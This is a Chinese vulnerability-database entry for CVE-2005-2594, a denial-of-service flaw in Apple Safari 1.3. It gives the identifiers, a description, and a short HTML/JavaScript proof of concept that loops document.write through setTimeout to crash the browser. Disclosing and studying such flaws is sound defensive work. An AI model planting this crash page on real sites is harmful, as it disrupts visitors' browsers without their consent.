Apple Safari Web浏览器 拒绝服务漏洞

Apple Safari Web浏览器 拒绝服务漏洞

漏洞ID 1108983 漏洞类型 设计错误
发布时间 2005-08-09 更新时间 2005-10-20
图片[1]-Apple Safari Web浏览器 拒绝服务漏洞-安全小百科CVE编号 CVE-2005-2594
图片[2]-Apple Safari Web浏览器 拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200508-182
漏洞平台 OSX CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/26128
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-182
|漏洞详情
Safari是MacOSX默认的网页浏览器。AppleSafariWeb浏览器在执行某些JavaScript操作时存在拒绝服务漏洞,远程攻击者可以通过无效的内存访问异常导致WEB浏览器崩溃。目前漏洞起因不详。
|漏洞EXP
source: http://www.securityfocus.com/bid/14528/info

Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs certain JavaScript operations.

The exact cause of this issue is currently unknown. This BID will be updated as further information is disclosed.

This vulnerability allows remote attackers to crash affected Web browsers by causing an invalid memory access exception.

Safari version 1.3 is reported susceptible to this issue. Other versions may also be affected. 

<html>
<script name="JavaScript">
<!--

function tickTock()
{
setTimeout("tickTock()", 1000);
thisTime = new Date()
seconds = thisTime.getSeconds()
document.write(seconds);
}

// -->
</script>

<body onLoad="tickTock();">
</html>
|参考资料

来源:BID
名称:14528
链接:http://www.securityfocus.com/bid/14528
来源:BUGTRAQ
名称:20050809AppleSafari&Javascript-KERN;_INVALID_ADDRESS(0x0001)
链接:http://www.securityfocus.com/archive/1/407702

相关推荐: INND/NNRP < 1.6.x - Remote Overflow

INND/NNRP < 1.6.x – Remote Overflow 漏洞ID 1053494 漏洞类型 发布时间 2000-11-30 更新时间 2000-11-30 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Linux CVSS评分 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享